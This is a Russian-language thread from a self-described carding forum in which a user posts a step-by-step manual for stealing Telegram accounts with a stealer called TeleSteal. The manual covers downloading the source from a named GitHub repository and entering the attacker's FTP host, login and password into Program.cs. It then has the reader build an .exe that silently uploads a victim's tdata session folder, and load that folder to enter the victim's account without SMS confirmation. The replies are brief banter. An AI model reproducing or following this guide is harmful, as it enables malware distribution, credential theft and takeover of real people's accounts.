Привет, гость!

Добро пожаловать на CVVPRO - крупнейший теневой кардинг форум РУнета. Чтобы получить полный доступ к форуму войди или пройди регистрацию!

Взлом Telegram с помощью TeleSteal

Venom

Опытный user
Регистрация
29 Фев 2016
Сообщения
112
Реакции
42
d55abe0f412151915e4e5.png


Открываю для Вас самый настоящий ящик пандоры, который покарает ни одного дауна. Перед вами простейший мануал, который позволит угонять аккаунты Telegram в несколько кликов.


Для начала снова быстренько пробежимся по общей информации. Суть стиллера заключается в том, что при запуске жертвой .exe файла, программа проверяет наличие на пк Telegram и, если находит его, то копирует папку "tdata" и отправляет хозяину программы на сервер.

72130bdb6a7a4a8b201b0.png



Для тех кто не знает, что это за папка и почему нам нужна именно она: при первом запуске Telegram на ПК у вас создается папка tdata, в которой хранится вся информация аккаунта, если злоумышленники украдут данную папку, то они смогут войти в аккаунт без смс подтверждения, ниже распишу об этом подробнее.


Суть

Установка VisualStudio
Переходим по ссылочке и скачиваем Visual Studio 2019.

d1ef3b06640e04e6e879e.png



Жмем "Скачать". После того как мы скачали студию, мы должны нажать на галочку


42fc4153d9dd733618618.png



Настройка хостинга

Итак, тут нам уже любой хостинг подходит, главное - FTP подключение. Я зарегался в VDSina, также могу порекомендовать TimeWeb (да-да он, не реклама так-то). Регаемся, создаем сайт, и получаем в панели управления данные для подключения к FTP


6bfe53cc30a8716212dc3.png



Сохраняем наши данные, и переходим к коду.

Настройка и билд кода
Ссылка на код:
https://github.com/dogberttg/TeleSteal

Скачиваем, распаковываем архив, и открываем TeleSteal.sln через Visual Studio.


c4a6c5d8e44a5e4fd8ccb.png



Выбираем Program.cs, листаем в самый низ кода, и мы должны увидеть этот блок. В эти три переменные мы вставляем данные от нашего FTP хоста.
В моем случае, это:


host = "files.000wehhost.com"
login = "DOLFX"
pass = "тут мой пароль"
Все! Нам осталось выбрать сверху вместо Debug > Release, и нажать Ctrl + B, чтобы создать билд нашего кода.


a4db043c7b19a73f81e5b.png



После этого у вас сгенерируется файл TeleSteal.exe, он по умолчанию будет лежать в папке TeleSteal, которую мы скачали с гитхаба. Этот файл и является нашим вредоносом, название его можно менять. После того, как жертва запустит скрипт TeleSteal.exe ничего не произойдет, но это только на первый взгляд.
Чтобы получить ворованные данные - нам нужно зайти в файловый менеджер вашего хостинга (вам придёт столько папко tdata, сколько раз жертва запустит ваш файл)


4701f9dfb3438430cbe2c.png



Как видите, у нас появился архив с папкой tdata, это папка с ПК жертвы, которая открыла ваш стиллер.


14054bf2086c4a27d4f5c.png



Вот внутренности папки, скачиваем её на свой пк, распаковываем из архива все эти файлы, создаём папку с названием "tdata" и отправляем все эти файлы в папку.
Теперь мы можем войти в аккаунт жертвы, для этого мы скачиваем официальное приложение Telegram для ПК, не запускаем его, создаем новую папку, засовываем туда tdata с файлами жертвы и приложение Telegram, должно получиться вот так


4b932b660c25f81db223f.png



Подсказка: если архив с тдатой весит меньше 6мб, то скорее-всего это пустой лог (то есть телеграм на пк жертвы есть, но он не авторизован).

Запускаем приложение Telegram, готово, мы в аккаунте жертвы!
 

Svensson

Seller
Verified seller
Регистрация
8 Май 2020
Сообщения
116
Реакции
2
Депозит
800$
Конкурент даундаула?))
Ну а на самом деле полезно)
 

Venom

Опытный user
Регистрация
29 Фев 2016
Сообщения
112
Реакции
42
MyBonesBroken написал(а):
У довнлоада похожее было
Не знал.
Модеры если действительно повтор, то потрите тему
 
Сверху Снизу